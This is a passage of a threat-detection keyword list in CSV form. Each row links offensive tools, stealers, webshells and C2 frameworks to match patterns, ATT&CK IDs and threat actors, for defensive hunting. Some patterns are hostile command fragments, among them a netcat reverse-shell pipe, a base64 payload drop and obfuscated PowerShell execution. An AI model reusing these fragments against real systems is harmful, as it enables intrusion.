"*_USBSTOR#Disk&Ven_&Prod_&Rev_0000*53f56307-b6bf-11d0-94f2-00a0c91efb8b*",".{0,1000}._USBSTOR#Disk&Ven_&Prod_&Rev_0000.{0,1000}53f56307-b6bf-11d0-94f2-00a0c91efb8b.{0,1000}","offensive_tool_keyword","Hak5 BashBunny","multi-function USB attack tool enabling automation attack payloads and various exploits by emulating trusted USB devices like keyboards - network adapters and mass storage devices","T1056 - T1059 - T1204","TA0001 - TA0009 - TA0002","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid #linux","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","20183"
"*{os.getlogin()} | Fentanyl*",".{0,1000}\{os\.getlogin\(\)\}\s\|\sFentanyl.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","20184"
"*{process_to_inject}.exe*",".{0,1000}\{process_to_inject\}\.exe.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","20185"
"*| favfreak*",".{0,1000}\|\sfavfreak.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","20187"
"*| fOreacH-obJeCT {( [Int]$_-As[ChAr]) })))"" 1> \Windows\Temp\* 2>&1*",".{0,1000}\|\sfOreacH\-obJeCT\s\{\(\s\[Int\]\$_\-As\[ChAr\]\)\s\}\)\)\)\""\s1\>\s\\Windows\\Temp\\.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","20188"
"*| hakrawler*",".{0,1000}\|\shakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","0","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","20189"
"*|/bin/sh -i 2>&1|nc * >/tmp/f*",".{0,1000}\|\/bin\/sh\s\-i\s2\>\&1\|nc\s.{0,1000}\s\>\/tmp\/f.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#linux","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","20192"
"*|base64 -d > /tmp/traitor*",".{0,1000}\|base64\s\-d\s\>\s\/tmp\/traitor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","20193"
"*|f||e||t||c||h||-||s||o||m||e||-||p||r||o||x||i||e||s|*",".{0,1000}\|f\|\|e\|\|t\|\|c\|\|h\|\|\-\|\|s\|\|o\|\|m\|\|e\|\|\-\|\|p\|\|r\|\|o\|\|x\|\|i\|\|e\|\|s\|.{0,1000}","offensive_tool_keyword","fetch-some-proxies","Simple Python script for fetching ""some"" (usable) proxies","T1090 - T1071 - T1070","TA0002 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/stamparm/fetch-some-proxies","1","0","N/A","N/A","9","6","585","138","2023-03-15T09:14:25Z","2016-10-09T22:39:56Z","20194"
"*|IEX}DumpSAM*",".{0,1000}\|IEX\}DumpSAM.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","20195"
"*~/.csexec*",".{0,1000}\~\/\.csexec.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","20196"
"*< /dev/console | uudecode && uncompress*",".{0,1000}\<\s\/dev\/console\s\|\suudecode\s\&\&\suncompress.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver  buffer overflow allows a string passed to popen() call to be controlled by an attacker  arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","20197"
"*</NetRipper>*",".{0,1000}\<\/NetRipper\>.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","20198"
"*<3 eo.oe ~ ANSSI E>*",".{0,1000}\<3\seo\.oe\s\~\sANSSI\sE\>.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file-analysis/YjU2NjE0YjBiOGNlMzNhZDVlYzRhYWFkMjJhNzQ4ZGQ6MTcyNDUyMDQ0Mw==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20200"
"*<3 eo.oe*",".{0,1000}\<3\seo\.oe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20201"
"*<BadPotato.exe>*",".{0,1000}\<BadPotato\.exe\>.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","0","#originalfilename","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","20205"
"*<CoffeLdr.h>*",".{0,1000}\<CoffeLdr\.h\>.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","20206"
"*<Data Name=""Product"">Moriarty<*",".{0,1000}\<Data\sName\=\""Product\""\>Moriarty\<.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","N/A","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","20207"
"*<Data Name='PipeName'>\lsass</Data><Data Name='Image'>*ProcessHacker*</Data>*",".{0,1000}\<Data\sName\=\'PipeName\'\>\\lsass\<\/Data\>\<Data\sName\=\'Image\'\>.{0,1000}ProcessHacker.{0,1000}\<\/Data\>.{0,1000}","offensive_tool_keyword","processhacker","dump lsass process with processhacker","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","pipe connect ED 18 sysmon","10","10","N/A","N/A","N/A","N/A","20211"
"*<Diag:ProcessStartInfo FileName=""cmd*",".{0,1000}\<Diag\:ProcessStartInfo\sFileName\=\""cmd.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","telerik_report_server_deserialization.rb","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20227"
"*<Diag:ProcessStartInfo FileName=""cmd*",".{0,1000}\<Diag\:ProcessStartInfo\sFileName\=\""cmd.{0,1000}","offensive_tool_keyword","POC","CVE-2024-4358 POC exploitation","T1190 - T1210 - T1059.001 - T1078 - T1203","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/sinsinology/CVE-2024-4358","1","0","N/A","N/A","10","1","75","16","2024-06-06T16:18:08Z","2024-06-03T08:22:10Z","20228"
"*<h1>.:NCC:. Shell v*",".{0,1000}\<h1\>\.\:NCC\:\.\sShell\sv.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php text webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20229"
"*<H1><center>-=[+] IDBTEAM SHELLS*",".{0,1000}\<H1\>\<center\>\-\=\[\+\]\sIDBTEAM\sSHELLS.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","#content","php text webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20230"
"*<h1>All your files was encrypted!*",".{0,1000}\<h1\>All\syour\sfiles\swas\sencrypted!.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","20231"
"*<h1>JSP Backdoor Reverse Shell*",".{0,1000}\<h1\>JSP\sBackdoor\sReverse\sShell.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20233"
"*<h1>Password Hasher for PHP Shell 2.1*",".{0,1000}\<h1\>Password\sHasher\sfor\sPHP\sShell\s2\.1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20234"
"*<h1>PHP Shell <?php echo offender ?>*",".{0,1000}\<h1\>PHP\sShell\s\<\?php\secho\soffender\s\?\>.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20235"
"*<h1>PhpShell 2.0*",".{0,1000}\<h1\>PhpShell\s2\.0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20236"
"*<h1>PowerAutomate C2 Portal*",".{0,1000}\<h1\>PowerAutomate\sC2\sPortal.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","#content","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","20237"
"*<H1>PowerUp report for *",".{0,1000}\<H1\>PowerUp\sreport\sfor\s.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","20238"
"*<H1>PowerUp report for *",".{0,1000}\<H1\>PowerUp\sreport\sfor\s.{0,1000}","offensive_tool_keyword","PowerUpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20239"
"*<H1>PowerUp report for *",".{0,1000}\<H1\>PowerUp\sreport\sfor\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20240"
"*<h1>Spider DDOS Shell*",".{0,1000}\<h1\>Spider\sDDOS\sShell.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20241"
"*<h1>Wraith Login*",".{0,1000}\<h1\>Wraith\sLogin.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","20242"
"*<h2>Laudanum Tools*",".{0,1000}\<h2\>Laudanum\sTools.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php text webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20243"
"*<H2>Vulnerabl Schasks*",".{0,1000}\<H2\>Vulnerabl\sSchasks.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","20244"
"*<h2>Why pay us?</h2>*",".{0,1000}\<h2\>Why\spay\sus\?\<\/h2\>.{0,1000}","offensive_tool_keyword","SunCrypt","SunCrypt ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","20245"
"*<h3>RFI Olarak Kullanilmaz .PHP Olarak Host'a Yukleyiniz*",".{0,1000}\<h3\>RFI\sOlarak\sKullanilmaz\s\.PHP\sOlarak\sHost\'a\sYukleyiniz.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20246"
"*<head><title>Wardom | Ne Mutlu T*",".{0,1000}\<head\>\<title\>Wardom\s\|\sNe\sMutlu\sT.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20247"
"*<param name=""""keylogger""*",".{0,1000}\<param\sname\=\""keylogger\"".{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20248"
"*<SessionId>: list/steal token from specific session*",".{0,1000}\<SessionId\>\:\slist\/steal\stoken\sfrom\sspecific\ssession.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#content","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","20256"
"*<title>Dynasty Persist</title>*",".{0,1000}\<title\>Dynasty\sPersist\<\/title\>.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","20259"
"*<title>PrivescCheck Report</title>*",".{0,1000}\<title\>PrivescCheck\sReport\<\/title\>.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","20260"
"*<title>Sosyete Safe Mode Bypass Shell -*",".{0,1000}\<title\>Sosyete\sSafe\sMode\sBypass\sShell\s\-.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20261"
"*<title>SyRiAn Sh3ll ~*",".{0,1000}\<title\>SyRiAn\sSh3ll\s\~.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20262"
"*<title>WebRoot Hack Tools""*",".{0,1000}\<title\>WebRoot\sHack\sTools\"".{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20263"
"*<title>Wraith Login</title>*",".{0,1000}\<title\>Wraith\sLogin\<\/title\>.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","20264"
"*= ""evil-proxy""*",".{0,1000}\=\s\""evil\-proxy\"".{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","20265"
"*= HUC Packet Transmit Tool V*",".{0,1000}\=\sHUC\sPacket\sTransmit\sTool\sV.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#content","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","20266"
"*= Welcome to Orc Shell =*",".{0,1000}\=\sWelcome\sto\sOrc\sShell\s\=.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux #content","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","20267"
"*=[ 1n73ct10n privat shell ]=*",".{0,1000}\=\[\s1n73ct10n\sprivat\sshell\s\]\=.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20268"
"*== NoPowerShell v* ==*",".{0,1000}\=\=\sNoPowerShell\sv.{0,1000}\s\=\=.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","20269"
